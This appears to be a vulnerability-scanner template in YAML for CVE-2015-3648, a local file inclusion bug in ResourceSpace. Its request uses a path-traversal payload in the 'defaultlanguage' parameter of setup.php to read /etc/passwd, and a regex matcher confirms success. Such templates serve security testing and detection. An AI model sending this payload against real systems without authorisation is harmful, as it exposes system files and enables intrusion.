32 lines
917 B
YAML
32 lines
917 B
YAML
id: CVE-2015-3648
|
|
|
|
info:
|
|
name: ResourceSpace - Local File inclusion
|
|
author: pikpikcu
|
|
severity: high
|
|
description: ResourceSpace is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
|
|
reference:
|
|
- https://vulners.com/cve/CVE-2015-3648/
|
|
- https://www.securityfocus.com/bid/75019
|
|
- http://svn.montala.com/websvn/revision.php?repname=ResourceSpace&path=%2F&rev=6640&peg=6738
|
|
- http://packetstormsecurity.com/files/132142/ResourceSpace-7.1.6513-Local-File-Inclusion.html
|
|
classification:
|
|
cve-id: CVE-2015-3648
|
|
tags: cve,cve2015,lfi,resourcespace
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|